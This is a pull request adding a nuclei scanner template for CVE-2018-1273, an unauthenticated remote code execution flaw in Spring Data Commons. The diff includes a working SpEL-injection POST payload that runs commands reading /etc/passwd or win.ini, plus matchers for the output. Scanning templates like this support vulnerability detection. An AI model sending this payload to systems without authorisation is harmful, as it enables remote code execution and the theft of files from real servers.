### PR TITLE
Add CVE-2018-1273

### DIFF
--- a/cves/CVE-2018-1273.yaml
+++ b/cves/CVE-2018-1273.yaml
@@ -1,0 +1,34 @@
+id: cve-2018-1273
+
+info:
+  name: Spring Data Commons Unauthenticated RCE
+  author: dwisiswant0
+  severity: critical
+  description: |
+    Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
+    and older unsupported versions, contain a property binder vulnerability
+    caused by improper neutralization of special elements.
+    An unauthenticated remote malicious user (or attacker) can supply
+    specially crafted request parameters against Spring Data REST backed HTTP resources
+    or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
+
+requests:
+  - payloads:
+      command:
+        - "cat /etc/passwd"
+        - "type C:\\/Windows\\/win.ini"
+    raw:
+      - |
+        POST /account HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Content-Type: application/x-www-form-urlencoded
+
+        name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('command')}}')]=nuclei
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+        part: body


### PR DESCRIPTION
**Spring Data Commons Unauthenticated RCE**
> CVE-2018-1273: Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
    and older unsupported versions, contain a property binder vulnerability
    caused by improper neutralization of special elements.
    An unauthenticated remote malicious user (or attacker) can supply
    specially crafted request parameters against Spring Data REST backed HTTP resources
    or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.